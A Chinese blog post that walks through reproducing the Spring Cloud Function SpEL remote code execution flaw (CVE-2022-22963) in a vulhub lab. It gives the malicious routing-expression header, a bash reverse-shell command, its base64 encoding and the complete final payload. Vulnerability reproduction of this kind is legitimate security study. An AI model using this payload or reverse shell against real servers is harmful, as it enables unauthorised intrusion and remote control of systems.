vulhub spring 远程命令执行漏洞(CVE-2022-22963)

最新推荐文章于 2024-09-11 00:01:46 发布
最新推荐文章于 2024-09-11 00:01:46 发布
阅读量313 收藏 2
点赞数 5
文章标签: spring java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_82451607/article/details/142027270
版权

1.打开环境

进入环境所在的文件夹

docker-compose up -d 一键启动容器

2.浏览器访问环境

3.抓包

http://192.168.10.233:8080/functionRouter进行抓包

抓包修改请求方式

4.修改请求体内容

spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("xxxx")

exec中写需要执行的命令

反弹shell

bash -i >& /dev/tcp/192.168.10.233/8989 0>&1

经过base64编码

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjIzMy84OTg5IDA+JjE=

最终payload

spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjIzMy84OTg5IDA+JjE=}|{base64,-d}|{bash,-i}")

5.开启监听端口

成功反弹shell

cc775210
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Spring Cloud Gateway远程代码执行漏洞CVE-2022-22947)
初岄的博客
07-09 888
Spring Cloud Gateway远程代码执行漏洞CVE-2022-22947)
CVE-2022-22965:Spring远程代码执行漏洞
热门推荐
一只爱吃橙子的羊
04-09 3万+
CVE-2022-22965:Spring Framework远程代码执行漏洞
vulhub系列】CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
Wiofgb的博客
08-28 3072
记录一次CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
CVE-2022-22947 SpringCloud Gateway 远程命令执行漏洞
dust_hk的博客
03-07 6539
CVE-2022-22947 SPRINGCLOUD GATEWAY SPEL RCE 摘要 Spring Cloud Gateway的商业产品是分布式API网关,用于路由HTTP请求并处理跨领域问题,如单点登录(SSO),速率限制,访问控制。借助Spring Cloud Gateway forKubernetes,运营商可以专注于管理和监控其目标环境中的API网关,而应用程序开发人员可以专注于API的公开方式,并应用适当的设计和跨领域问题。 在 3.1.1+ 和 3.0.7+ 之前的 spring clo
Spring Cloud Gateway远程命令执行漏洞CVE-2022-22947)
Bird&Bird
03-13 639
使用Spring Cloud Gateway的应用程序在Actuator端点启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可以恶意创建允许在远程主机上执行任意远程执行的请求。 当攻击者可以访问actuator API时,就可以利用该漏洞执行任意命令
Spring Cloud Gateway远程代码执行CVE-2022-22947漏洞分析及复现
include_voidmain的博客
03-29 1694
0x01 漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。 据公布的漏洞描述称,当Spring Cloud Gateway 执行器端点启用、公开且不安全时,使用Spring Cloud Gateway的应用程序容易受到代码注入攻击。远程攻击者可以发出含有恶意代码的请求,从而允许在远程主机上任意远程执行。 0x02 漏洞影响 漏洞编号:CVE-2
【安全漏洞SpringBoot + SpringSecurity CORS跨域资源共享配置
weixin_42925623的博客
09-05 1500
今天我们就来了解一下这个CROS漏洞,并记录一下在整合了springSecurity这一套安全框架下的springboot系统中如何在后端过滤器中通过正确注册WebMvcConfigurer bean来配置CORS的全局设置,实现对非白名单访问源的拦截。
Lombok失效:报错 找不到符号 Springboot项目
qq_42704130的博客
09-10 331
错误原因,Springboot项目为Lombok提供了版本管理的支持,所以引入Lombok依赖的时候,无需手动指定版本,手动指定了可能会导致依赖冲突。去掉手动指定的版本,问题解决。
SpringBoot总结
2302_77073236的博客
09-06 247
都做成图了,方便理解和掌握全局关系。
基于SpringBoot的多媒体信息共享平台开发
qq_45800365的博客
09-06 227
基于SpringBoot的多媒体信息共享平台开发,java项目。eclipse和idea都能打开运行。推荐环境配置:eclipse/idea jdk1.8 maven mysql前端技术:vue,Ajax,Json后端技术:SpringBoot,MyBatis本系统共分为两个角色:管理员和用户。主要功能有:后台:系统首页个人中心用户管理作品分类管理作品信息管理私聊信息管理系统管理前台:首页作品信息公告信息后台管理个人中心。
Spring 源码解读:实现@Conditional的条件化配置
qq_40254606的博客
09-10 566
条件化配置是Spring框架中的一个强大特性,允许我们根据运行时的特定条件来决定是否加载Bean。本文将通过手动实现一个简单的`@Conditional`注解,探讨其原理和实现方式,并与Spring中的`@Conditional`进行对比,帮助读者理解其工作机制和实际应用场景。
spring】微服务架构中的VO命名
突围
09-05 227
matchreqvo
Java项目: 基于SpringBoot+mysql企业客户管理系统(含源码+数据库+答辩PPT+毕业论文)
weixin_43860634的博客
09-05 548
Java项目: 基于SpringBoot+mysql企业客户管理系统(含源码+数据库+答辩PPT+毕业论文)
Spring
weixin_69595694的博客
09-06 1395
5.2、编写配置文件bean-base.xml 5.3、编写测试 6、Spring下的IOC 6.0、创建对象的属性解析 6.1、创建无参的对象 6.2、创建带参数的对象 6.3、通过静态工厂创建对象 6.3.1、创建工厂类 6.3.2、编写描述 6.4、通过非静态工厂创建对象 6.4.1、创建工厂类 6.4.2、创建描述 7、Spring下的DI 7.1、通过Set注入(开发中使用的最多的一种) 7.1.1、编写UserService 7.1.2、编写
JWT令牌技术解决spring博客项目的登录问题(三)
最新发布
2202_76101487的博客
09-11 455
本文写了使用jwt令牌技术完成用户的登录;
SpringBoot开发——初步了解SpringBoot
bjzhang75的博客
09-02 1552
Spring Boot是一个构建在Spring框架顶部的项目。它提供了一种简便,快捷的方式来设置,配置和运行基于Web的简单应用程序。它是一个Spring模块,提供了 RAD(快速应用程序开发)功能。它用于创建独立的基于Spring的应用程序,因为它需要最少的Spring配置,因此可以运行。简而言之,Spring Boot是 Spring Framework 和 嵌入式服务器的组合。在Spring Boot不需要XML配置(部署描述符)。
Python自带日志库实现springboot彩色效果
weixin_45411898的博客
09-10 855
整体目标涉及的库均为Python3自带库实现终端显示彩色基本原理参考👉Terminal里的颜色的那些事Python打印日志可以直接借用自带的库实现,但是默认的打印实在太丑了,长下面这样这只是一条日志看着还好比较清爽,如果多了之后可想而知,大片红色看着由多么糟糕,借鉴SpringBoot的处理怎么做到SpringBoot那样的彩色日志输出呢?这里突然想起来,Java自带的日志框架(JUL)打印也是一片红色,可能原生的东西都比较呆正。日志框架无论哪种语言基本都是遵循一样的做法,包括以下组件:正常打印一条日志,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值